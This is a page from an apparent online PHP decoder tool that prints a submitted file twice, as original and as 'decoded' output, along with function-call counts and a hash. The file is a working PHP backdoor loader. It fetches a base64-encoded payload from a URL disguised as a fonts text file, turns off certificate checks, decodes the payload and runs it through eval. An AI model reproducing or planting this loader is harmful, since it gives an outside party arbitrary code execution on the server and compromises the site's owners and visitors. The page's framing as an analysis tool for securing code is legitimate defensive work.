Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

i tr khng phi l thi<?php function getCurl0($url) { if (function_exists("curl_init")) ..

Decoded Output download

i tr khng phi l thi<?php 
function getCurl0($url) 
{ 
  if (function_exists("curl_init")) { 
    $ch = curl_init(); 
    curl_setopt($ch, CURLOPT_URL, $url); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); 
    $result = curl_exec($ch); 
    curl_close($ch); 
    return $result; 
  } 
} 
?> 
<?=eval("?>".(base64_decode(getCurl0 ('https://vindhyagroup.org/assets/site/fonts/int.txt'))));                 ?>?>  s a

Did this file decode correctly?

Original Code

i tr khng phi l thi<?php
function getCurl0($url)
{
  if (function_exists("curl_init")) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
  }
}
?>
<?=eval("?>".(base64_decode(getCurl0 ('https://vindhyagroup.org/assets/site/fonts/int.txt')))); __halt_compiler();?>  s a

Function Calls

getCurl0 1
base64_decode 1
function_exists 1

Variables

$url https://vindhyagroup.org/assets/site/fonts/int.txt

Stats

MD5 2bbcdf02c830dbd31798ba2491f8f53e
Eval Count 0
Decode Time 103 ms